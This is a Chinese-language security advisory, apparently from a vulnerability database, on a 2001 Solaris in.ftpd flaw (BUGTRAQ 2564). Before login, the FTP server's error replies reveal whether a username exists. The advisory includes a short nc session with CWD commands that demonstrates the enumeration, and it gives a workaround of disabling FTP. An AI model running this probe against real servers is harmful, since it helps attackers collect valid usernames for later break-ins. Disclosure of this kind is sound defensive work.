发布日期：2001-04-19
更新日期：2001-04-19

受影响系统：

Solaris 8 (SPARC, x86)
Solaris 7 (SPARC, x86)
Solaris 2.6/2.5以及更低版本 (SPARC, x86)

描述：

---

BUGTRAQ ID: 2564

Solaris 所带的in.ftpd没有正确考虑用户登录之前执行某些命令的情况。
因此用户在登录进入系统之前执行某些FTP命令，in.ftpd将会返回一些错
误信息。这可能给攻击者以猜测系统中用户名的机会。

<*来源：Johnny Cyberpunk (johncybpk@gmx.net) *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

nc vulnerable.host 21
220 gsmms0 FTP server (SunOS 5.6) ready.
cwd ~netadm
530 Please login with USER and PASS.
cwd ~xyz
530 Please login with USER and PASS.
550 Unknown user name after ~


建议：

---

临时解决方法：

如果您不需要FTP服务，请暂时关闭FTP.

厂商补丁：
暂无


浏览次数：3944
严重程度：0（网友投票）